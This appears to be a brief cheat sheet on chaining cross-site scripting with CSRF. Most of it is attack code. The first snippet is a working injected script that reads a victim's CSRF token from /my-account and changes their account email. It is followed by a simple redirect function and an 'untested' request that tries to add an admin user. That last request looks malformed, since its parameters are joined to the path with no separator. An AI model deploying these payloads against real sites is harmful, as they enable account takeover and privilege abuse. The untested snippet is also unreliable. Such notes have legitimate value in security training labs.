XSS Chain CSRF

The request below will send a GET request to /my-account, and subsequently a POST request to /my-account/change-email

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

XSS to open redirect:

// Redirect the user to another URL within the same domain
function redirectTo(urlPath) {
    // Redirect to the specified URL
    window.location.href = urlPath;
}

// redirect to "/new-page"
redirectTo("/new-page");

Alternative untested:

var xhttp = new XMLHttpRequest();
var creds = 'email=peter@pan.com&password=test&name=test&username=test';
xhttp.open("GET", "/admin/users/add" + creds, true);
xhttp.send();